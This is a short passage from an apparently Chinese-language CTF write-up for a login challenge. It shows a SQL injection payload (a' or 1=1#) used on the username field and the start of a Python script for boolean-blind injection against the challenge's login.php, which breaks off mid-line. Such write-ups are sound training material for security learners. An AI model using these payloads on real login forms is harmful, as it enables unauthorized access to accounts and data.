1. 浏览
浏览网址:
按流程先把源码、请求头、响应头查看一遍,没有线索,尝试弱口令登录,提示用户名不存在
2. 注入
用户名输入a' or 1=1#
,密码随便,提示密码错误,存在注入点。
编写注入脚本如下:
# -*- coding: utf-8 -*-
import requests
url="http://84b5fe286b214096b9d0a44928cddd242fb7291df5c24b54.changame.ichunqiu.com/Challenges/login.php"
contentchr_list=list('1234567890qwertyuiopasdfghjklzxcvbnm')
def judge_response(name):
headers = {'User-Agent': "Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0"}
payload = dict(username=name, password='test')
response = requests.post(url=url, data=payload, headers=headers)
judgement = response.text.__len__()
if judgement == 4:
return Tr